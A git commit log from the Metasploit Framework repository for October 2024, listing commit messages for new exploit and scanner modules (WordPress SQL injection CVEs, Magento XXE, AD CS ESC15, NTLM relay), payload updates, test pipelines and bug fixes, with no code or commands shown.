2024-10-30 15:03:29 +00:00
Metasploit ffb4659bd0 automatic module_metadata_base.json update 2024-10-30 08:43:24 -05:00
jheysel-r7 d107ac8470 Land #19488 Add aux module for unauth SQLi in Ultimate Member plugin 2024-10-30 09:06:17 -04:00
jheysel-r7 094250f7e7 Land #19489 Add WordPress wp-automatic SQLi to RCE module 2024-10-30 09:05:03 -04:00
h00die 9da5177d11 remove old code 2024-10-29 16:44:48 -04:00
h00die 41ed44864f wp_post_smtp_acct_takeover 2024-10-29 16:44:20 -04:00
h00die 4feb12ab4a untested code 2024-10-29 16:44:20 -04:00
jheysel-r7 87af327507 Merge branch 'master' into wp_ultimate_member_sorting_sqli 2024-10-29 16:34:10 -04:00
Spencer McIntyre 778af81c4c Update metasploit-payloads gem to 2.0.186
Includes changes from:
* rapid7/metasploit-payloads#721
* rapid7/metasploit-payloads#729
* rapid7/metasploit-payloads#728
2024-10-29 16:20:25 -04:00
Chocapikk bcd1fab0b8 Add suggestions 2024-10-29 20:42:13 +01:00
Chocapikk 7ccb2991f6 Improve nonce detection, fix bug 2024-10-29 19:41:47 +01:00
Spencer McIntyre 9f41937c7a Finish up the exploit module 2024-10-28 17:20:35 -04:00
h00die-gr3y 2c40621d18 added report_web_vuln as suggested by the reviewer 2024-10-28 14:27:05 +00:00
Spencer McIntyre b2075e5e6b Merge pull request #19553 from smashery/offered-etype-fix
Only retrieve cached credentials that match the requested KrbOfferedEncryptionTypes
2024-10-28 09:47:26 -04:00
Metasploit 1a6cf9dfa7 automatic module_metadata_base.json update 2024-10-25 17:07:35 -05:00
adfoster-r7 6e1ea9297f Merge pull request #19360 from gardnerapp/osx_daemon_privesc
Add LaunchDaemon Persistence to exploits/osx/local/persistence.rb
2024-10-25 22:42:38 +01:00
Spencer McIntyre 6965c2f60a Merge pull request #19551 from smashery/ldap_session_bugfix
Don't require Username and Password for every RHost auth: allows Scha…
2024-10-25 17:12:30 -04:00
h00die-gr3y 6aeb9d130b added the output option to the documentation 2024-10-25 14:13:18 +00:00
h00die-gr3y ae176fdfd5 update based on review comments of adfoster-r7 2024-10-25 14:01:10 +00:00
h00die-gr3y 5aaf0b22cd update based on review comments of adfoster-r7 2024-10-25 10:41:10 +00:00
Spencer McIntyre 27d5c95323 Refactor into an SMB server relay mixin 2024-10-24 16:25:40 -04:00
Spencer McIntyre 9822f3e812 Decouple the NTLM relaying logic 2024-10-24 16:25:40 -04:00
Spencer McIntyre 8ba0019ca0 Refactor the existing relay target client code 2024-10-24 16:25:40 -04:00
bwatters-r7 a18b2b3671 code cleanup and documentation 2024-10-24 15:23:10 -05:00
bwatters dff4a8ba7c Updates per Spencer 2024-10-24 15:23:10 -05:00
bwatters 30b0e0ad29 Update debug prints and fix create_csr parameter 2024-10-24 15:23:10 -05:00
bwatters c4c1aae565 Update smb thread logging, fix control flow, use RELAY_TARGET, other suggestions 2024-10-24 15:23:10 -05:00
bwatters 74f6bc7d13 Remove Rescues and Rubocop 2024-10-24 15:23:10 -05:00
bwatters 6dcf63267b Fix rescue clauses 2024-10-24 15:23:10 -05:00
bwatters 0b94fdf75f Fix up suggestions from Spencer et al. 2024-10-24 15:23:10 -05:00
bwatters 1fb0b728a8 Fix timeout, add query_only mode and allow skipping the termplate query 2024-10-24 15:23:10 -05:00
bwatters 4c598c1981 Move ESC8 logic to module and limit debug printing 2024-10-24 15:23:09 -05:00
bwatters 5b1746f73f Add support for multiple certs 2024-10-24 15:23:09 -05:00
bwatters 0ba3db9466 Working, but ugly 2024-10-24 15:23:09 -05:00
bwatters af25c94e6a Change to send_request_raw 2024-10-24 15:23:09 -05:00
bwatters d94081faf1 Not working; need to checnge to send_request_raw? 2024-10-24 15:23:09 -05:00
bwatters 2c760bd842 Tracking down hash issues 2024-10-24 15:23:09 -05:00
bwatters 7d86c99ba6 Currently getting a bad username/password message 2024-10-24 15:23:09 -05:00
Alex 6fb49a27e0 [Added] Improvements after review 2024-10-24 13:48:50 +02:00
Metasploit 1af43ca110 Bump version of framework to 6.4.34 2024-10-24 06:48:37 -05:00
adfoster-r7 fcd8622cda Merge pull request #19575 from cgranleese-r7/adds-gem-handling-to-accpetance-tests
Builds metasploit-payload gem as part of acceptance tests
2024-10-24 11:48:29 +01:00
adfoster-r7 78a55a32dc Merge pull request #19585 from adfoster-r7/update-mettle-version
Update mettle version
2024-10-24 11:07:41 +01:00
cgranleese-r7 86f9554c3d Builds metasploit-payload gem as part of acceptance tests 2024-10-24 10:58:48 +01:00
adfoster-r7 92a9163260 Update mettle version 2024-10-24 10:43:49 +01:00
Metasploit 2db574e6c4 automatic module_metadata_base.json update 2024-10-24 04:34:56 -05:00
adfoster-r7 9ac3f57a17 Merge pull request #19536 from GhostlyBox/patch-1
Update enum_unattend.rb
2024-10-24 10:10:08 +01:00
cgranleese-r7 eddfda0784 Land #19577, Fix crash when running meterpreter shell command 2024-10-24 09:54:18 +01:00
adfoster-r7 88825a022c Remove trailing whitespace 2024-10-23 23:41:20 +01:00
h00die-gr3y d9f8b66d21 updated documentation with some small tweaks 2024-10-23 17:36:00 +00:00
h00die-gr3y 331a3ad74a second release module and documentation with some small tweaks 2024-10-23 14:40:00 +00:00
h00die-gr3y 82e0b34670 added documentation 2024-10-23 13:11:14 +00:00
h00die-gr3y 735695e45f first release module 2024-10-23 12:58:26 +00:00
h00die-gr3y 23e6889839 init commit module 2024-10-23 11:36:32 +00:00
h00die-gr3y 4a1d31f239 small update on the documentation 2024-10-23 10:36:59 +00:00
h00die-gr3y d6e080a253 first release module + documentation 2024-10-23 10:25:43 +00:00
dwelch-r7 e899f1681f Merge pull request #19581 from adfoster-r7/add-additional-paths-for-triggering-meterpreter-acceptance
Add additional paths for triggering meterpreter acceptance
2024-10-23 10:33:45 +01:00
adfoster-r7 f78559edef Add additional paths for triggering meterpreter acceptance 2024-10-23 10:17:40 +01:00
dwelch-r7 b2e8a50fdc Land #19580, Add gitleaksignore file 2024-10-23 10:16:11 +01:00
adfoster-r7 8c9f670b81 Merge pull request #19576 from adfoster-r7/fix-crash-when-importing-metasploit-xml-file
Fix crash when importing Metasploit xml file
2024-10-23 10:14:01 +01:00
adfoster-r7 46271c6721 Add gitleaksignore file 2024-10-23 10:00:17 +01:00
h00die-gr3y abf81619d4 init commit module 2024-10-23 08:45:32 +00:00
adfoster-r7 fdfda1f7e3 Fix crash when running meterpreter shell command 2024-10-23 00:35:47 +01:00
adfoster-r7 d7c8836f3b Fix crash when importing Metasploit xml file 2024-10-22 23:47:44 +01:00
Metasploit b03d666d18 automatic module_metadata_base.json update 2024-10-22 14:24:00 -05:00
Spencer McIntyre 05a149dadc Merge pull request #19572 from cdelafuente-r7/fix/mod/ldap/ad_cs_cert_template
Fix UPDATE certificate templates with `admin/ldap/ad_cs_cert_template`
2024-10-22 15:03:31 -04:00
Christophe De La Fuente ae213813b5 Updates from code review 2024-10-22 14:41:02 +02:00
h4x-x0r 661075a45c handling additional case
handling additional case when autocheck is disabled and no credentials are provided
2024-10-22 03:42:39 +01:00
h4x-x0r 4d7d7f2c06 updated
using instance variables instead of updating the datastores
2024-10-21 22:07:43 +01:00
h4x-x0r 7028b807ed linting
linting
2024-10-21 21:45:04 +01:00
h4x-x0r b6d3a0ef36 safety flag
added a safety flag for the password reset in case no credentials are provided
2024-10-21 21:43:48 +01:00
h4x-x0r d950bf7bb3 updated
updated
2024-10-21 20:51:41 +01:00
Alex 1fa9c6a774 [Fixed] Opera Support 2024-10-21 17:03:37 +02:00
adfoster-r7 9c0efc67fb Merge pull request #19567 from bcoles/wordlists
data/wordlists: Add default passwords for common single-board computers
2024-10-21 11:58:23 +01:00
Alex e6aa695e99 Update enum_browsers.rb 2024-10-21 09:48:24 +02:00
Alex 87b2cb7f5a Fix Readme 2024-10-20 23:19:17 +02:00
Alex ecd9f99d16 [Added] Extract Browser Cache 2024-10-20 23:15:18 +02:00
Alex a2d8d7dd76 [Added] Extract Installed Browser Extensions (Name & Version) 2024-10-20 21:23:06 +02:00
h4x-x0r 202e5e55ac Added exception handling
Added exception handling
2024-10-20 19:50:43 +01:00
Jack Heysel cf85992531 Placeholder commit 2024-10-18 16:11:06 -07:00
adfoster-r7 27fa707095 Merge pull request #19571 from sjanusz-r7/fix-readline-unresponsive-on-windows-11
Monkey-patch Readline to fix unresponsiveness on Windows 11
2024-10-18 18:59:53 +01:00
sjanusz-r7 7dc918f122 Don't monkey patch RbReadline multiple times 2024-10-18 18:51:40 +01:00
adfoster-r7 b60a70b970 Merge pull request #19570 from cgranleese-r7/fix-reusable-pipeline-report-generation
Fixes reusable pipeline allure report generation
2024-10-18 18:30:08 +01:00
Christophe De La Fuente 43f13c7e90 Add the msPKI-Template-Schema-Version attribute to ESC1, ESC2 and ESC3 templates 2024-10-18 18:57:50 +02:00
adfoster-r7 501713fb2b Update .github/workflows/shared_meterpreter_acceptance.yml 2024-10-18 17:47:33 +01:00
adfoster-r7 bb26b733d0 Apply suggestions from code review 2024-10-18 17:46:36 +01:00
sjanusz-r7 02dd5ac604 Monkey-patch Readline to fix unresponsiveness on Windows 11 2024-10-18 17:46:25 +01:00
cgranleese-r7 3da061e670 Fixes resuable pipeline report generation 2024-10-18 17:05:01 +01:00
adfoster-r7 e96d9b2be2 Merge pull request #19568 from cgranleese-r7/adds-smb-acceptance-testing-reusable-pipeline
Adds SMB reusable pipeline for acceptance testing
2024-10-18 16:22:49 +01:00
cgranleese-r7 a753dc1799 Adds SMB reusable pipeline for acceptance testing 2024-10-18 15:51:13 +01:00
bcoles e50767bb6f data/wordlists: Add default passwords for common single-board computers 2024-10-19 00:49:14 +11:00
adfoster-r7 afa7fd7cdd Merge pull request #19564 from cgranleese-r7/adds-acceptance-testing-reusable-pipeline
Adds a resuable pipeline for acceptance testing
2024-10-18 14:20:56 +01:00
Metasploit 11531af2b9 automatic module_metadata_base.json update 2024-10-18 08:02:37 -05:00
cgranleese-r7 d614d594ea Label and input logic adjustments 2024-10-18 13:54:10 +01:00
Diego Ledda 59d026acd3 Land #19544, Magento Arbitrary File Read (CVE-2024-34102) + PHP Buffer Overflow iconv() of GLIBC (CVE-2024-2961) 2024-10-18 14:39:54 +02:00
cgranleese-r7 6aea17380f Adds a resuable pipeline for acceptance testing 2024-10-18 11:21:05 +01:00
Metasploit 4422322cd0 Bump version of framework to 6.4.33 2024-10-17 12:37:56 -05:00
Metasploit a6ba890a33 automatic module_metadata_base.json update 2024-10-17 12:17:01 -05:00
Spencer McIntyre 77f63442d7 Add the initial higher level client 2024-10-17 12:54:25 -04:00
Spencer McIntyre 619620733d Add the initial Ivanti Agent Portal RCE 2024-10-17 12:54:25 -04:00
Spencer McIntyre 4dbcde793b Add the definitions for MS-NRTP messages 2024-10-17 12:54:25 -04:00
Spencer McIntyre 39698ec1ed Add the BinaryArray record definition 2024-10-17 12:54:25 -04:00
Spencer McIntyre 574654888b Add the BinaryMethodCall record definition 2024-10-17 12:54:25 -04:00
Spencer McIntyre 1c84d5719f Add a basic MethodReturn definition 2024-10-17 12:54:25 -04:00
Christophe De La Fuente f636a9e466 Land #19538, Add Support for ESC15 2024-10-17 18:08:14 +02:00
Spencer McIntyre 98f9112437 Report ESC vulns found in LDAP 2024-10-17 11:24:23 -04:00
Spencer McIntyre 6ca0bb74fd Add workflow docs 2024-10-17 11:23:31 -04:00
Spencer McIntyre 2e4315b3c9 Add support to icpr_cert for ESC15 2024-10-17 11:23:31 -04:00
Spencer McIntyre 8d943efc30 Add the ldapwhoami command support
See RFC4532 and ruby-ldap/ruby-net-ldap#425
2024-10-17 11:23:31 -04:00
Spencer McIntyre 94535bbfab Add support for finding ESC15 2024-10-17 11:23:31 -04:00
Spencer McIntyre 8e38010d6e Add an ESC15 template 2024-10-17 11:23:31 -04:00
Spencer McIntyre fd1f14e5ab Add the x509 definitions for ESC15 2024-10-17 11:23:31 -04:00
Metasploit 76d3980c44 Bump version of framework to 6.4.32 2024-10-17 04:54:21 -05:00
cgranleese-r7 3bd875c4e6 Land #19563, Update metabase setuptoken rce to support older versions 2024-10-17 10:42:26 +01:00
Metasploit 70eed21c2d automatic module_metadata_base.json update 2024-10-17 04:30:26 -05:00
Diego Ledda e85ee0271d Land #19482, LearnPress SQLi module (CVE-2024-8522, CVE-2024-8529) 2024-10-17 11:13:49 +02:00
adfoster-r7 7b400f18fe Fix metabase rce to support older versions 2024-10-17 10:10:50 +01:00
Metasploit 49b0644104 automatic module_metadata_base.json update 2024-10-16 18:32:46 -05:00
adfoster-r7 26e041dbfe Merge pull request #19108 from smashery/new_cmd_exec
New process launch API
2024-10-17 00:08:06 +01:00
adfoster-r7 b281d46c2d Merge pull request #19495 from cdelafuente-r7/fix/pkinit/san_extension
Fix crash in `Kerberos::Client::Pkinit#extract_user_and_realm` with specific SAN extension
2024-10-16 23:10:38 +01:00
Metasploit 5827355c87 automatic module_metadata_base.json update 2024-10-16 16:27:59 -05:00
adfoster-r7 f74b3eaf32 Merge pull request #19561 from cdelafuente-r7/enh/ldap_esc_vulnerable_cert_finder/report_vuln
Add vulnerability report capability to the `ldap_esc_vulnerable_cert_finder` module
2024-10-16 22:12:34 +01:00
Ashley Donaldson 94d72b2b8b Update metasploit-payloads gem to 2.0.183 2024-10-17 07:01:00 +11:00
Christophe De La Fuente b9509dc882 Report vulns in ldap_esc_vulnerable_cert_finder 2024-10-16 21:23:21 +02:00
Ashley Donaldson 197595659e Better timeout for PHP 5.3 tests, which apparently take forever 2024-10-16 16:53:53 +11:00
Ashley Donaldson 9972587fef Handle weird PowerShell edge case 2024-10-16 16:04:39 +11:00
Ashley Donaldson 205adfe2fd Handle edge case in command shell when input contains backslash-quote combination already 2024-10-16 10:26:29 +11:00
Jack Heysel 59e18d5158 Updates to Gemfile.lock 2024-10-15 10:54:40 -07:00
Jack Heysel ee68e47521 Added http_server cleanup 2024-10-15 10:28:39 -07:00
Jack Heysel 7a89db5080 Updated print statements 2024-10-15 09:21:07 -07:00
Jack Heysel 3635dd1c23 Merge branch 'magento_xxe_to_rce' 2024-10-15 09:17:40 -07:00
Jack Heysel 3f6f060933 Updated check method 2024-10-15 09:17:02 -07:00
Metasploit 26d8d23596 automatic module_metadata_base.json update 2024-10-15 10:35:55 -05:00
Diego Ledda 9a245e6e06 Land #19485, Module BYOB Unauthenticated RCE (CVE-2024-45256, CVE-2024-45257)
Land #19485, Module BYOB Unauthenticated RCE (CVE-2024-45256, CVE-2024-45257)
2024-10-15 17:13:15 +02:00
Ashley Donaldson bdfa1f3a3f Update metasploit-payloads gem to 2.0.180 2024-10-15 23:43:17 +11:00
bcoles 8ba1034105 Add tests for Linux Execute Command 32-bit/64-bit RISC-V LE payloads 2024-10-15 22:51:36 +11:00
bcoles 27ebde9ad5 Add Linux Execute Command 32-bit/64-bit RISC-V LE payloads 2024-10-15 22:51:36 +11:00
bcoles 5e1ecfc0c0 Add tests for Linux Reboot 32-bit/64-bit RISC-V LE payloads 2024-10-15 22:51:36 +11:00
bcoles befabb8887 Add 32-bit/64-bit RISC-V LE NOP sled modules 2024-10-15 22:51:36 +11:00
bcoles 92cf931d6e Add Linux Reboot 32-bit/64-bit RISC-V LE payloads 2024-10-15 22:51:36 +11:00
bcoles f244d07bd0 Msf::Util::EXE: Add support for RISC-V ELF executables 2024-10-15 22:51:36 +11:00
bcoles 1c748d376a Add RISC-V 32-bit/64-bit ELF templates 2024-10-15 22:51:32 +11:00
Metasploit d32b771caa automatic module_metadata_base.json update 2024-10-15 06:35:45 -05:00
Diego Ledda 236639f584 Land #19473, Module for unauthenticated SQL Injection Vulnerability in WP Fastest Cache (CVE-2023-6063)
Land #19473, Module for unauthenticated SQL Injection Vulnerability in WP Fastest Cache (CVE-2023-6063)
2024-10-15 13:10:59 +02:00
Metasploit 23484e0172 automatic module_metadata_base.json update 2024-10-15 05:57:47 -05:00
dwelch-r7 9cb3fefb40 Land #19539, Keep LDAP sessions alive 2024-10-15 11:28:08 +01:00
Ashley Donaldson 7890595dd9 Add one more annoying test case 2024-10-15 21:21:01 +11:00
h4x-x0r 7929df2bfd improved reliability
improved reliability
2024-10-15 06:26:46 +01:00
Chocapikk a79fd2a1c7 Add right payload for CVE-2024-8529 2024-10-14 18:15:02 +02:00
Chocapikk 193712c7e4 Update 2024-10-14 18:15:02 +02:00
Chocapikk cfe22d4788 Use Msf::Exploit::Remote::HTTP::Wordpress::SQLi 2024-10-14 18:15:02 +02:00
Chocapikk 145a23625d Add LearnPress SQLi module (CVE-2024-8522, CVE-2024-8529) 2024-10-14 18:15:01 +02:00
Valentin Lobstein f0f0ee88cf Update modules/auxiliary/scanner/http/wp_ultimate_member_sorting_sqli.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-10-14 18:14:11 +02:00
Chocapikk bb651667dd Update 2024-10-14 18:14:11 +02:00
Chocapikk 13497a5a33 Use Msf::Exploit::Remote::HTTP::Wordpress::SQLi 2024-10-14 18:14:11 +02:00
Chocapikk 1525a61a19 Use negative number 2024-10-14 18:14:10 +02:00
Chocapikk 0fd76f32a0 Remove comments 2024-10-14 18:14:10 +02:00
Chocapikk 668424a444 Add unauth SQLi exploit module for Ultimate Member plugin (CVE-2024-1071) 2024-10-14 18:14:10 +02:00
Valentin Lobstein 0686cdbb82 Update modules/exploits/multi/http/wp_automatic_sqli_to_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-10-14 18:13:19 +02:00
Valentin Lobstein fdb450955e Update modules/exploits/multi/http/wp_automatic_sqli_to_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-10-14 18:13:19 +02:00
Chocapikk 611a16d368 Update 2024-10-14 18:13:18 +02:00
Chocapikk 465ae37ad2 Use wordpress_sqli_initialize instead 2024-10-14 18:13:18 +02:00
Chocapikk a9f7fb3ace Use Msf::Exploit::Remote::HTTP::Wordpress::SQLi 2024-10-14 18:13:18 +02:00
Chocapikk 6c099f2b73 Add WordPress wp-automatic SQLi to RCE module (CVE-2024-27956) 2024-10-14 18:13:17 +02:00
Chocapikk 4807b6f3a9 Add banner 2024-10-14 18:11:42 +02:00
Chocapikk 95e64a0a3b Add module for TI WooCommerce Wishlist SQL Injection (CVE-2024-43917) 2024-10-14 18:11:41 +02:00
Chocapikk 36162ab8bb Fix exploitation bug 2024-10-14 18:03:50 +02:00
Chocapikk a87e915028 Update 2024-10-14 18:03:50 +02:00
Chocapikk 37eeeadba6 Use Msf::Exploit::Remote::HTTP::Wordpress::SQLi 2024-10-14 18:03:49 +02:00
Valentin Lobstein a687a6c3c8 Update modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb 2024-10-14 18:03:49 +02:00
Chocapikk 63c3a12bf4 Restore 'tcp' instead of 'http' because 'ActiveRecord::RecordInvalid Validation failed: Proto is not included in the list' 2024-10-14 18:03:49 +02:00
Chocapikk 272c09d2b7 fix typo 2024-10-14 18:03:48 +02:00
Chocapikk b99f0e6e30 Re-add import (to use target_uri) 2024-10-14 18:03:48 +02:00
Valentin Lobstein 41b513cec5 Update modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb 2024-10-14 18:03:48 +02:00
Valentin Lobstein 121dc19ea9 Update modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-10-14 18:03:47 +02:00
Chocapikk def55173e1 Randomize values + remove useless mixin import 2024-10-14 18:03:47 +02:00
Chocapikk 8553f625a4 Add auxiliary/scanner/http/wp_fastest_cache_sqli 2024-10-14 18:03:46 +02:00
h4x-x0r 5716b6c799 linting
linting
2024-10-14 15:56:00 +01:00
h4x-x0r ea74802a5a cleanup
cleanup
2024-10-14 15:53:07 +01:00
h4x-x0r bd7cd8b3ba cleanup
cleanup
2024-10-14 15:36:45 +01:00
Diego Ledda d2b4175f49 Land #19497, add Wordpress SQLi Mixin
Land #19497, add Wordpress SQLi Mixin
2024-10-14 13:13:52 +02:00
Chocapikk f881a0e592 Remove useless verbosity 2024-10-14 11:46:53 +02:00
Ashley Donaldson 9b4cd2241d Update payload sizes 2024-10-14 15:43:40 +11:00
Ashley Donaldson 1b169efe3d Update payload dependencies 2024-10-14 15:27:15 +11:00
h4x-x0r 34538df83c PoC and Documentation
PoC and Documentation
2024-10-14 05:09:29 +01:00
Graeme Robinson 5228acb0f1 Update werkzeug_debug_rce docs to show modified output 2024-10-13 23:11:52 +01:00
Graeme Robinson f369a80fcc Satisfy msftidy_docs against werkzeug_debug_rce.md 2024-10-13 22:55:12 +01:00
Graeme Robinson 3a79c6d70f rubocop -a on werkzeug_debug_rce.rb 2024-10-13 22:36:35 +01:00
NtAlexio2 6983ec5e12 fix lintings in pipe_dcerpc_auditor 2024-10-13 13:38:05 -04:00
Graeme Robinson f17fc282bc Made suggested changes to werkzeug_debug_rce.rb 2024-10-13 00:19:50 +01:00
Ashley Donaldson 1c4b22028d Comment neatening from code review 2024-10-12 14:36:09 +11:00
Ashley Donaldson 6450a8f916 Support backwards compatibility for Python 2024-10-12 14:36:09 +11:00
Ashley Donaldson 0cf227ff00 Change API. Support backwards compatibility for PHP 2024-10-12 14:36:09 +11:00
Ashley Donaldson 6d12d506dd Run the Python tests (fixed in payloads repo) 2024-10-12 14:36:09 +11:00
Ashley Donaldson ac50cede6f Remove unused line 2024-10-12 14:36:09 +11:00
Ashley Donaldson 27e3376fba Allow longer acceptance tests - needed for PHP 5.3 2024-10-12 14:36:09 +11:00
Ashley Donaldson b4da4e74af Use specific subclass of Command Shell for reverse bash 2024-10-12 14:36:09 +11:00
Ashley Donaldson c543971b8a Support uploading files on linux shell containing quote characters 2024-10-12 14:36:09 +11:00
Ashley Donaldson a32a302f09 Fix issue with windows command shells 2024-10-12 14:36:09 +11:00
Ashley Donaldson 2a8924ead3 Fix shell file upload when filename has interesting characters 2024-10-12 14:36:09 +11:00
Ashley Donaldson 75157f8759 Fix test case for java on Windows 2024-10-12 14:36:09 +11:00
Ashley Donaldson 7a5471a673 Fix bug in chmod for Java meterp 2024-10-12 14:36:09 +11:00
Ashley Donaldson 6fc714c954 Take stderr tests back out for now 2024-10-12 14:36:09 +11:00
Ashley Donaldson ec4e944405 Fix file upload in PowerShell 2024-10-12 14:36:09 +11:00
Ashley Donaldson 602506bdb9 Updated for PHP and Python 2024-10-12 14:36:08 +11:00
Ashley Donaldson 593d06e1f5 Tests working on Windows 10 meterp 2024-10-12 14:36:08 +11:00
Ashley Donaldson a69b777a9e Included tests for create_process API 2024-10-12 14:36:08 +11:00
Ashley Donaldson 880203b503 Remove accidentally committed changes 2024-10-12 14:36:08 +11:00
Ashley Donaldson 0ab16ae3af Fix bug when no arguments are present 2024-10-12 14:36:08 +11:00
Ashley Donaldson d9ed8ec4dc Rework unix command line based on testing 2024-10-12 14:36:08 +11:00
Ashley Donaldson 5d71aa26e3 Treat old-style path separately to new (unescaped) path 2024-10-12 14:36:08 +11:00
Ashley Donaldson 7d30c67b01 Fix error sending legacy args 2024-10-12 14:36:08 +11:00
Ashley Donaldson fe61e46475 Changes from code review 2024-10-12 14:36:08 +11:00
Ashley Donaldson 658c9fcc32 Comment function 2024-10-12 14:36:08 +11:00
Ashley Donaldson 85d019cd3c Handle CommandLineToArgv behaviour 2024-10-12 14:36:08 +11:00
Ashley Donaldson 0d4d6f345d create_process works for basic CommandShell instances 2024-10-12 14:36:08 +11:00
Ashley Donaldson e9f86c4865 Reworked unix create_process, as it was buggy 2024-10-12 14:36:08 +11:00
Ashley Donaldson e0aca71029 Add unix shell to create_process API 2024-10-12 14:36:08 +11:00
Ashley Donaldson 72e657a19c Implement new cmd_exec API for Windows cmd 2024-10-12 14:36:08 +11:00
Ashley Donaldson 955c675334 Implement new cmd_exec API for PowerShell 2024-10-12 14:36:08 +11:00
h4x-x0r d28a098398 CVE-2024-9464
CVE-2024-9464
2024-10-11 19:31:56 +01:00
Ashley Donaldson a854689424 Added new failing test for windows junction points 2024-10-11 21:17:51 +11:00
Alex 6d272759dc Add Browser Version Detection and display System Information 2024-10-11 12:13:48 +02:00
Ashley Donaldson 617270265d Only retrieve cached credentials that match the requested OfferedEncryptionTypes 2024-10-11 16:23:26 +11:00
adfoster-r7 cb10062cb2 Merge pull request #19540 from smashery/ua_strings_oct24
Update User Agent strings for October 2024
2024-10-11 01:15:12 +01:00
Ashley Donaldson 395e74359e Update User Agent strings for October 2024. Add script to automate this in future. 2024-10-11 09:31:07 +11:00
Ashley Donaldson fa2b7e54a6 Fix unit tests 2024-10-11 08:22:40 +11:00
Ashley Donaldson c732fed617 Feedback from code review 2024-10-11 08:22:39 +11:00
Ashley Donaldson 22cf3f05d5 Send a benign LDAP request every 10 minutes to keep sessions alive 2024-10-11 08:22:39 +11:00
Ashley Donaldson 9cb4cce9b4 Don't require Username and Password for every RHost auth: allows Schannel cert and Kerberos cached ticket auth 2024-10-11 08:00:20 +11:00
adfoster-r7 00b1d8fec6 Merge pull request #19549 from zeroSteiner/fix/bump-payloads/2.0.175
Update metasploit-payloads gem to 2.0.175
2024-10-10 20:54:16 +01:00
jheysel-r7 3be4eae2f5 Update modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-10-10 15:20:06 -04:00
Mathieu 8c5bead4a0 Added spec to reproduce the username/password generation error in case PASSWORD_SPRAY and USER_AS_PASS are both enabled
Added minimal code to fix the issue, extracting the code to generate username:username credentials in the PASSWORD_SPRAY case
2024-10-10 21:15:50 +02:00
Jack Heysel 44b33b8010 Fixed multiple sessions and instability 2024-10-10 11:36:16 -07:00
Spencer McIntyre 0309f51314 Update metasploit-payloads gem to 2.0.175
Includes changes from:
* rapid7/metasploit-payloads#719
* rapid7/metasploit-payloads#718
* rapid7/metasploit-payloads#715
* rapid7/metasploit-payloads#713
* rapid7/metasploit-payloads#712
* rapid7/metasploit-payloads#709
* rapid7/metasploit-payloads#708
* rapid7/metasploit-payloads#705
* rapid7/metasploit-payloads#704
* rapid7/metasploit-payloads#703
2024-10-10 14:18:11 -04:00
Alex 91beef1dbb Add BROWSER_TYPE option to choose between Chromium, Gecko, or both for data extraction 2024-10-10 20:08:14 +02:00
Alex 47c4679d6b Fixed migration logic 2024-10-10 19:28:03 +02:00
dwelch-r7 81146170c8 Land #19548, Update php actions plugin version 2024-10-10 16:15:04 +01:00
adfoster-r7 dfa9a548b5 Update php actions plugin version 2024-10-10 15:50:03 +01:00
Alex d3ae5a9ab0 Abort when session is running under SYSTEM privileges. 2024-10-10 13:25:11 +02:00
Alex cd487715c4 [Added] Migration to explorer.exe for user-context based extraction 2024-10-10 12:32:19 +02:00
adfoster-r7 93e0ca7cd5 Improve database module cache performance 2024-10-10 10:52:19 +01:00
Metasploit 93344df7e1 Bump version of framework to 6.4.31 2024-10-10 04:23:08 -05:00
Jack Heysel 65936d181e Update libc region on sucess print 2024-10-09 23:04:44 -07:00
Jack Heysel dab5d66e37 Test and respond to comments 2024-10-09 22:52:55 -07:00
jheysel-r7 b72f70cbac Apply suggestions from code review
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-10-10 00:40:54 -04:00
Jack Heysel 7a78c0d724 Updated authors 2024-10-09 13:14:09 -07:00
Jack Heysel a4ef40a233 Updated docs with Options section 2024-10-09 13:08:20 -07:00
Jack Heysel b94b2f3c72 Merge conflicts and rubocop 2024-10-09 12:59:59 -07:00
Jack Heysel e8711c5b20 Magento XXE to GLIBC buffer overflow 2024-10-09 12:53:29 -07:00
Jack Heysel 9536eaae2d Magento XXE to GLIBC buffer overflow 2024-10-09 12:36:53 -07:00
Spencer McIntyre 5b69945386 Merge pull request #19542 from dledda-r7/docs-19454
docs: adding motd_persistence docs
2024-10-09 14:02:32 -04:00
dledda-r7 3211edd83c docs: review changes 2024-10-09 12:18:35 -04:00
Valentin Lobstein c259ce090a Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 17:22:33 +02:00
Valentin Lobstein c15f186311 Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:04:54 +02:00
Valentin Lobstein fb35f6709a Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:04:44 +02:00
Valentin Lobstein 94145eafe9 Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:04:32 +02:00
Valentin Lobstein 6c048df53f Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:04:23 +02:00
Valentin Lobstein de5324e160 Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:04:13 +02:00
Valentin Lobstein 3987a761e7 Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:04:01 +02:00
Valentin Lobstein 31a66d537b Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:03:52 +02:00
Valentin Lobstein c1521633f4 Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:03:42 +02:00
Valentin Lobstein 8cbe572f49 Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
